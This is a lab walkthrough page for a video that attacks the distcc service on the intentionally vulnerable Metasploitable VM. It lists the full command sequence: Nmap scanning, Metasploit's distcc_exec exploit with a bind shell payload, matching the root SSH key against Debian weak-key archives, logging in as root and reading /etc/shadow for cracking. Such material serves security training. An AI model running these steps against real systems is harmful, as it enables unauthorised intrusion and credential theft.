Metasploitable - DistCC

This video demonstrates an attack on the DistCC service on the metasploitable hackable box.

"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com

"distcc is a program to distribute builds of C, C , Objective C or Objective C code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile"- distcc.samba.org

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Metasploitable-DistCC.mp4

Download (debian_ssh_rsa_2048_x86.tar.bz2): *Coming soon*

Method

  • Use Nmap to scan the network (gathering information)
  • Use Nmap to do a more detailed scan of the target (gathering information)
  • Use Metasploit to send a payload (remote access)
  • I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"
  • Via the payload it is possible to capture the SSH Key and compare it against the weak keys Just like pWnOS (escalating privileges)
  • Connect via SSH as root (complete access)
  • Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)

Tools

  • Nmap - on Backtrack 4 (Final)
  • Metasploit - on Backtrack 4 (Final)
  • SSH - on Backtrack 4 (Final)
  • Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) - *Coming soon*
  • Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
nmap 192.168.1.1/24
nmap -sS -sV -p1-65535 -O -f -n -v 192.168.1.105
msfconsole
search distcc
use exploit/unix/misc/distcc_exec
show options
setg RHOST 192.168.1.105
show payloads
setg payload generic/cmd/unix/bind_perl
show options
exploit
ls
whoami
ls -lart/root
ls -lart/root/ .ssh
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc Wv8Vw7bwkf 1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
Firefox www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048/
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc Wv8Vw7bwkf 1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
whoami
hostname
ifconfig
cat /etc/shadow

Notes

Song: Josh Abrahams - Joker

Video length: 4:51

Capture length: 6:28

Blog Post: https://blog.g0tmi1k.com/2010/07/metasploitable-distcc/